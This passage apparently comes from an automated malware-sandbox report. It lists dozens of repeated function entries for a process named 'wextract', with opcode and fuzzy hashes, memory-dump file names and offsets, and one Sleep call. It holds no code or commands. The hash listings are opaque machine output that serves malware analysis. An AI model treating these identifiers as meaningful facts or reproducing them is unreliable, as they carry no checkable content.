                                                                                  • Instruction ID: 6731c2cbf93e5dc4bcb35c49067ae434b41e33003a4fcb72679ceea697ab5a11
                                                                                  • Opcode Fuzzy Hash: 4b6c949a57d0fad1615afe7d6e8aafbc91a03e5c723051488ab88fad5f7df87c
                                                                                  • Instruction Fuzzy Hash: 5290023164550403F1007558451470620058BD1205F69C412A0425669E9795DA5165A2
                                                                                  Function 04604650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: be597208e75b5a13be31feca36af06637c68506aa61abf86eef8600f0fc34404
                                                                                  • Instruction ID: b14f3b264fe0e157c37592fc18bfea09f5b8f2c9b3110455811ab9a5c19f52cf
                                                                                  • Opcode Fuzzy Hash: be597208e75b5a13be31feca36af06637c68506aa61abf86eef8600f0fc34404
                                                                                  • Instruction Fuzzy Hash: 279002616415004361407558480440670059BE2305399C116A0555661D9718D9559269
                                                                                  Function 04604340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0aba922f10ab36ceebc265ee4264122af6d1092372bb08df404f892c384c9693
                                                                                  • Instruction ID: 06f3d1bee7133b5d96533ad189e58f2105ee639e800a8cf2f587ace067d43e2a
                                                                                  • Opcode Fuzzy Hash: 0aba922f10ab36ceebc265ee4264122af6d1092372bb08df404f892c384c9693
                                                                                  • Instruction Fuzzy Hash: 2690023164580013B1407558488454650059BE1305B59C012E0425655D9B14DA565361
                                                                                  Function 04602C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1328760edc28a7470ee9899e5a1f3425bc0e56f040716e1e1e586cfa6c4146c8
                                                                                  • Instruction ID: 7fe88fc5144c9cf6b57db1b4413efb1da58d1b9eb77de574ca0451d1a4219cb3
                                                                                  • Opcode Fuzzy Hash: 1328760edc28a7470ee9899e5a1f3425bc0e56f040716e1e1e586cfa6c4146c8
                                                                                  • Instruction Fuzzy Hash: 7A90023124140843F10075584404B4610058BE1305F59C017A0125755E9715D9517521
                                                                                  Function 04602C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3f9948de459a2de044a9bdb9aef79844da5144238a81b577bc43ef02c31cd5d0
                                                                                  • Instruction ID: 282f45e47b620ee690bbc90a34cf2a906003564675d1d2c162016aea257c276d
                                                                                  • Opcode Fuzzy Hash: 3f9948de459a2de044a9bdb9aef79844da5144238a81b577bc43ef02c31cd5d0
                                                                                  • Instruction Fuzzy Hash: 7890023124148803F1107558840474A10058BD1305F5DC412A4425759E9795D9917121
                                                                                  Function 04602CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8627477f57d208c55881f7f78240d42f7ad0da38badbe60a869a0ccedeecddd8
                                                                                  • Instruction ID: eb3c375407ed7b83403b61f882ba5e89cbfa9e081aa556d9a47c175b1e7df2be
                                                                                  • Opcode Fuzzy Hash: 8627477f57d208c55881f7f78240d42f7ad0da38badbe60a869a0ccedeecddd8
                                                                                  • Instruction Fuzzy Hash: 7A90023124140403F1007998540864610058BE1305F59D012A5025656FD765D9916131
                                                                                  Function 04602D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0d7ce272c3b3ba96125337a8ef955ee12c150299944cd18ddb81ab1069ba5230
                                                                                  • Instruction ID: 3471f9bfcc4570487717768445fbc2359edd3a7369f49f33a504e8821f7c2cdc
                                                                                  • Opcode Fuzzy Hash: 0d7ce272c3b3ba96125337a8ef955ee12c150299944cd18ddb81ab1069ba5230
                                                                                  • Instruction Fuzzy Hash: 7090022134140003F140755854186065005DBE2305F59D012E0415655DEA15D9565222
                                                                                  Function 04602D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9b967a1240f70e384f9c13a62b1504b0b6cf2ec1ac51cfc1a105d644b0ed1f07
                                                                                  • Instruction ID: 08b4cd0d25259da904db4e9e0cdf1c79f2f935d44b2fd3ee7e274aa8fa2d3ae8
                                                                                  • Opcode Fuzzy Hash: 9b967a1240f70e384f9c13a62b1504b0b6cf2ec1ac51cfc1a105d644b0ed1f07
                                                                                  • Instruction Fuzzy Hash: BA90022925340003F1807558540860A10058BD2206F99D416A0016659DDA15D9695321
                                                                                  Function 04602DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 29197772c54552d56ef8f823f9ac0dbb25ceaa37ffc41656bba6211d8032b7a4
                                                                                  • Instruction ID: 2de59be46825acb221caf7cb9ff5cbf93c38ee03e39e35da043b5f6314e4f226
                                                                                  • Opcode Fuzzy Hash: 29197772c54552d56ef8f823f9ac0dbb25ceaa37ffc41656bba6211d8032b7a4
                                                                                  • Instruction Fuzzy Hash: 1F90023124140413F1117558450470710098BD1245F99C413A0425659EA756DA52A121
                                                                                  Function 04602DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: db538f3e3da9b4bb5b1c97f60c95535db6666b5f842a3d2871ea51d8e3a5ba9c
                                                                                  • Instruction ID: 2fdee45193d69bb16bed822862b78fc0896203cea9402596ae9b800e0eebea7f
                                                                                  • Opcode Fuzzy Hash: db538f3e3da9b4bb5b1c97f60c95535db6666b5f842a3d2871ea51d8e3a5ba9c
                                                                                  • Instruction Fuzzy Hash: C5900221282441537545B558440450750069BE1245799C013A1415A51D9626E956D621
                                                                                  Function 04602EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2b1537f79484c4aa8cfc63b40e9c01627bcde052179839042869258e193b77c8
                                                                                  • Instruction ID: de57080b35265336f16cc7d4ee6efcdef858db1a09a5da73a9827fafad160e46
                                                                                  • Opcode Fuzzy Hash: 2b1537f79484c4aa8cfc63b40e9c01627bcde052179839042869258e193b77c8
                                                                                  • Instruction Fuzzy Hash: CF90026124180403F1407958480460710058BD1306F59C012A2065656F9B29DD516135
                                                                                  Function 04602E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a0a5080936b202205701d931a6a1839802b75226e675def0b4ecd61871b83c2a
                                                                                  • Instruction ID: 604cebcf570b8f73ad86f38528fac1d230774872d8eb544164605b066ab09e77
                                                                                  • Opcode Fuzzy Hash: a0a5080936b202205701d931a6a1839802b75226e675def0b4ecd61871b83c2a
                                                                                  • Instruction Fuzzy Hash: 4E90022164140503F10175584404616100A8BD1245F99C023A1025656FDB25DA92A131
                                                                                  Function 04602F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f76531b0c7693f7f0afe2b60e6f5589620e64c4d52ab39b2a926567cddab44df
                                                                                  • Instruction ID: db0b8a6e8efa5ee6397668e824325909192847b82ba7dd9efa0efee51504158b
                                                                                  • Opcode Fuzzy Hash: f76531b0c7693f7f0afe2b60e6f5589620e64c4d52ab39b2a926567cddab44df
                                                                                  • Instruction Fuzzy Hash: C490026138140443F10075584414B061005CBE2305F59C016E1065655E9719DD526126
                                                                                  Function 04602FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d9a571990c2614a15f0d6eea8c8e8830ddf73baed11f79256e7b70030b7f1599
                                                                                  • Instruction ID: e369ee90cbf0927fa2fa6f6aac811cc296b9e0b8434638c03b5d138efc8c2ca5
                                                                                  • Opcode Fuzzy Hash: d9a571990c2614a15f0d6eea8c8e8830ddf73baed11f79256e7b70030b7f1599
                                                                                  • Instruction Fuzzy Hash: DF900221251C0043F20079684C14B0710058BD1307F59C116A0155655DDA15D9615521
                                                                                  Function 04602FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 573d52500570112c7eba7d15cadcf4fb7b76e9bb8486a8e87f79fc69a3f6b2ba
                                                                                  • Instruction ID: 3db18ca9037dc18e6f6e99b9efddeff679db083552e59938c956cb32e30ec0d5
                                                                                  • Opcode Fuzzy Hash: 573d52500570112c7eba7d15cadcf4fb7b76e9bb8486a8e87f79fc69a3f6b2ba
                                                                                  • Instruction Fuzzy Hash: 8C900221641400436140756888449065005AFE2215759C122A0999651E9659D9655665
                                                                                  Function 046039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: c1e3dba6c01d455642fbb47446bfebfa4123a1b27def62635cd6ccbe955d7b4c
                                                                                  • Instruction ID: 9c3db33521cacb2f26c2f6cb80ceb478ba3c59c2fe4ce5adfe45502c3489b7ca
                                                                                  • Opcode Fuzzy Hash: c1e3dba6c01d455642fbb47446bfebfa4123a1b27def62635cd6ccbe955d7b4c
                                                                                  • Instruction Fuzzy Hash: FB90022128545103F150755C44046165005ABE1205F59C022A0815695E9655D9556221
                                                                                  Function 04602AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f82256c2ea73ce53185b6f5d18dcac54ba5ca4f2c01cd77d6738fc482b0f07bd
                                                                                  • Instruction ID: 46a5747bc534f87c3624c5289734b92dfe0810ba119397c54699737119884889
                                                                                  • Opcode Fuzzy Hash: f82256c2ea73ce53185b6f5d18dcac54ba5ca4f2c01cd77d6738fc482b0f07bd
                                                                                  • Instruction Fuzzy Hash: 16900225261400032145B958060450B14459BD7355399C016F1417691DD721D9655321
                                                                                  Function 04602AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a797167a2eed490862f2a93000e4e66a11842f7ece42509b1c793ec4528175e0
                                                                                  • Instruction ID: aa377d7e22bcdff7d2f03fb323bf5745ccc15a047726ee64fb90b9c31cab851d
                                                                                  • Opcode Fuzzy Hash: a797167a2eed490862f2a93000e4e66a11842f7ece42509b1c793ec4528175e0
                                                                                  • Instruction Fuzzy Hash: 2B900225251400032105B958070450710468BD6355359C022F1016651DE721D9615121
                                                                                  Function 04602B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2d62c845377338f337e839bc16e80ab01997746f48de860d0329f84e777834cd
                                                                                  • Instruction ID: 6fffc8d428f4c41a2f66ceb1357cd92a284ab10d9f6441f0276230d9e50c3223
                                                                                  • Opcode Fuzzy Hash: 2d62c845377338f337e839bc16e80ab01997746f48de860d0329f84e777834cd
                                                                                  • Instruction Fuzzy Hash: B290026124240003610575584414616500A8BE1205B59C022E1015691ED625D9916125
                                                                                  Function 04602BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0fc27b979c5622ff11e1cc2396b80b2198e41f1e410afde1955b70ece97836c1
                                                                                  • Instruction ID: 2cc6496aa0d909d395977c6e1f0f65f6e2acd4e67a060c5d58e88c9f7818f325
                                                                                  • Opcode Fuzzy Hash: 0fc27b979c5622ff11e1cc2396b80b2198e41f1e410afde1955b70ece97836c1
                                                                                  • Instruction Fuzzy Hash: 9E90023124544843F14075584404A4610158BD1309F59C012A0065795EA725DE55B661
                                                                                  Function 04602BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7a3e3ce2f18b4c37fe6f72fa7c313d120e1b8e3cb45f88d71fdf2f32edc369dd
                                                                                  • Instruction ID: 4cc2edd44bc18f4cc4d79535bf48689a9c7ead4ca5d58d43eed85cc9a39c2888
                                                                                  • Opcode Fuzzy Hash: 7a3e3ce2f18b4c37fe6f72fa7c313d120e1b8e3cb45f88d71fdf2f32edc369dd
                                                                                  • Instruction Fuzzy Hash: 1990023124140803F1807558440464A10058BD2305F99C016A0026755EDB15DB5977A1
                                                                                  Function 04602BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: cdf6381c01b2641a5fd0c1a43210b199afba247bac2d953d2cfec8557ec98ce4
                                                                                  • Instruction ID: 3afc1138b541a4631ceaf576420199e719b124a19e0c0415d4fb8c7b3c542b65
                                                                                  • Opcode Fuzzy Hash: cdf6381c01b2641a5fd0c1a43210b199afba247bac2d953d2cfec8557ec98ce4
                                                                                  • Instruction Fuzzy Hash: 1490023164540803F1507558441474610058BD1305F59C012A0025755E9755DB5576A1
                                                                                  Function 004237C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0042389B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
